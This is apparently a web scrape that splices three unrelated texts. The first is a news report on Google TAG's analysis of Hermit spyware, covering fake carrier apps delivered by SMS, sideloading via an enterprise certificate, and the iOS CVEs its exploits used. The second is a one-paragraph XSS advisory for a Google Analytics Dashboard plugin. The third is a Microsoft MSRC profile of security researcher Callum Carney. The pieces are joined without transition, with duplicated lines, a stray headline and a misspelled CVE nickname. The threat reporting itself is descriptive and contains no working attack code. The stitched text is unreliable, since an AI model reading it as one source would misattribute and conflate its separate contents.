Researchers outlined in a separate blog post by Ian Beer of Google Project Zero a case in which they discovered what appeared to be an iOS app from Vodafone but which in fact is a fake app. Attackers are sending a link to this malicious app by SMS to try to fool targets into downloading the Hermit spyware.

“The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app,” Beer wrote.

Indeed, this is likely the reason why most of the applications they observed in the Hermit campaign masqueraded as mobile carrier applications, Google TAG researchers wrote.

In other cases when they can’t work directly with ISPs, threat actors use apps appearing to be messaging applications to hide Hermit, according to Google TAG, confirming what Lookout previously discovered in its research.

****iOS Campaign Revealed****

While Lookout previously shared details of how Hermit targeting Android devices works, Google TAG revealed specifics of how the spyware functions on iPhones.

They also released details of the host of vulnerabilities—two of which were zero-day bugs when they were initially identified by Google Project Zero—that attackers exploit in their campaign. In fact, Beer’s post is a technical analysis of one of the bugs: CVE-2021-30983 internally referred to as Clicked3 and fixed by Apple in December 2021.

To distribute the iOS application, attackers simply followed Apple instructions on how to distribute proprietary in-house apps to Apple devices and used the itms-services protocol with a manifest file with com.ios.Carrier as the identifier, researchers outlined.

The resulting app is signed with a certificate from a company named 3-1 Mobile SRL that was enrolled in the Apple Developer Enterprise Program, thus legitimizing the certificate on iOS devices, they said.

The iOS app itself is broken up into multiple parts, researchers said, including a generic privilege escalation exploit wrapper which is used by six different exploits for previously identified bugs. In addition to Clieked3, the other bugs exploited are:

*   CVE-2018-4344 internally referred to and publicly known as LightSpeed;
*   CVE-2019-8605 internally referred to as SockPort2 and publicly known as SockPuppet;
*   CVE-2020-3837 internally referred to and publicly known as TimeWaste;
*   CVE-2020-9907 internally referred to as AveCesare; and
*   CVE-2021-30883 internally referred to as Clicked2, marked as being exploited in-the-wild by Apple in October 2021.

All exploits used before 2021 are based on public exploits written by different jailbreaking communities, researchers added.

****Broader Implications****

The emergence of Hermit spyware shows how threat actors—often working as state-sponsored entities—are pivoting to using new surveillance technologies and tactics following the blow-up over repressive regimes’ use of Israel-based NSO Group’s Pegasus spyware in cyberattacks against dissidents, activists and NGOs, as well as the murders of journalists.

Indeed, while use of spyware like Hermit may be legal under national or international laws, “they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians,” Google TAG researchers wrote.

The United States blacklisted NSO Group over the activity, which drew international attention and ire. But it apparently has not stopped the proliferation of spyware for nefarious purposes in the slightest, according to Google TAG.

In fact, the commercial spyware industry continues to thrive and grow at a significant rate, which “should be concerning to all Internet users,” researchers wrote.

“These vendors are enabling the proliferation of dangerous hacking tools and arming governments that would not be able to develop these capabilities in-house,” they said.

Google Warns Spyware Being Deployed Against Android, iOS Users

A vulnerability classified as problematic was found in Google Analytics Dashboard Plugin 2.1.1. Affected by this vulnerability is an unknown functionality. The manipulation leads to basic cross site scripting. The attack can be launched remotely.

CVE-2017-20092

Hidden Talents : He was a competitive swimmer for many years.
Instrument of Choice : His fingers were made for the keyboard, but he used to play the trumpet.
5 pieces of entertainment for the rest of his life : The Office, World War Z, The Matrix, Breaking Bad, The Thick of It.

**Hidden Talents** : He was a competitive swimmer for many years.

**Instrument of Choice** : His fingers were made for the keyboard, but he used to play the trumpet.

**5 pieces of entertainment for the rest of his life** : The Office, World War Z, The Matrix, Breaking Bad, The Thick of It.

**Favorite non-profit** : RSPCA

**How he takes his tea** : Through his mouth

**Superpower** : Doesn’t suffer from hangovers

The first thing you should know about Callum Carney is that he doesn’t like talking about himself. Shy? Not necessarily. Quick witted and charming? Yes. However, Callum is best understood through his actions, rather than his words. Callum is just 23 years old and a budding security research prodigy. At a young age he has achieved great success finding bugs in organizations like Microsoft, Spotify, and Google. While he would never toot his own horn, Callum has made monumental contributions in protecting the cloud and has quickly gained a reputation with plenty of accolades to show for it.

Callum was a young, inquisitive boy with a high interest in computers when his Habbo account was hacked. Someone stole his coins, and he was left irritated, but curious as to how it happened (he fully admits this was his fault since his password was Callum123). This little seed of injustice would grow within him as his passion for computers expanded too. Throughout his school years, he recalls spending more time fixing other people’s computers than learning in the classroom.

Early on he stumbled upon a live stream demonstrating Cross-Site Scripting (XSS) which piqued his interest. His hacking aspirations became a reality at the first sight of a pop-up alert on screen saying, “You’ve been hacked!!!”

> **From that moment I was hooked. I’ve never actually been able to come off this rush. Security research is addictive.**

One time in a college computer class Callum was tinkering around on his laptop during a lesson. Bored, but still as curious as ever, Callum began trying to hack the lesson websites domain. He ended up finding a devastating bug and reported it under the guise of anonymity in hopes of avoiding an awkward encounter down the road. However, he forgot to update the shared URL which ended up exposing _he_ was a student at the college. At this point he was just 16. As he put it, there are bound to be small mistakes when you’re starting out, right? Unbeknownst to him, the company hosting the affected website was a subsidiary of the college. Their team replied asking for him to meet to discuss his findings. After much deliberation (even with his mother) and fears of great repercussions, he accepted the meeting. To his good fortune, he was not arrested (ethical hacking is still a gray area in the UK). Instead, the company had the foresight to take a risk. They offered him a position within the company and Callum has been a part of their team for six years now!

When he isn’t working his day job, Callum moonlights as a security researcher. This is where his work speaks for itself. As a multi-year Microsoft Most Valuable Researcher (MVR) Callum’s reputation cannot be ignored. Whilst he didn’t set out to hunt for vulnerabilities for big tech, he is proud of his impact.

> **I see the whole community and what this space is, as the last line of defense. Inside large companies there are a lot of processes, and smart people who develop them. It’s up to us to check and make sure there is nothing left over. And it’s our job to find it. I see it as the last line for cyber security.**

When it comes to guiding the next generation of researchers, Callum strongly believes this field is for anybody, and there is no better time to get in on the action than right now.

> **The number of resources available to learn about security is always growing. In my opinion it’s great to learn by reading previously disclosed issues and getting hands-on with applications in the real world by finding vulnerabilities to report in organizations that have defined security policies.**

Callum stressed not to get demotivated if you aren’t successful immediately. Rather, he suggested that whatever you’re testing is made by humans and humans make mistakes. Keep on pushing, but don’t get burned out. Some of his favorite bugs to find are the ones where the general user is none the wiser. Take for example the time he was robbed of his coins as a kid playing Habbo. He would have liked to be the person who figured out you could steal from others, fix it, and the user would have no clue there was even a threat. The same concept applies to his larger bug bounties.

> **Stop doubting what you’re doing or coming up with reasons not to do something. Give it a go.**

Despite not caring to share too many words about himself, he is quite witty, and quick with comebacks which brings out a sort of endearing quality about who he is deep down. Fellow researcher Wouter (@wtm\_offensi) is happy to tell us what he thinks of Callum. “_Callum and I met in person for the first time about four years ago. This was at an invite-only bug bounty event where he gave an impressive talk about some of his bug hunting findings and experiences. During that event and the events that followed in the years after, I got to know Callum as a young yet skilled researcher who is not only great fun to be around (who doesn’t like a good sense of British humor) but also knows when to work hard to deliver high impact bugs that get the job done. After working together and sharing our insights at some undisclosed hacking event we kept in touch online to share ideas on some of our findings. Sharing information with other researchers is not always the easiest thing to do, since most of us rely on bugs as a (main) source of income, yet Callum is always willing to help think things over as a sparring partner. Nowadays we occasionally collaborate on research related to Azure, to help each other forward and make the hunt for bugs more fun. Callum always seems to be able to find targets that are exciting to work on, e.g., potential targets. I’m a big fan of the man himself and his work_.”

Like WTM, we are huge fans of Callum (@callum\_infosec) and we cannot thank him enough for his amazing research and partnership with MSRC! Thank you for your contributions that help secure Microsoft customers.

Tag

#google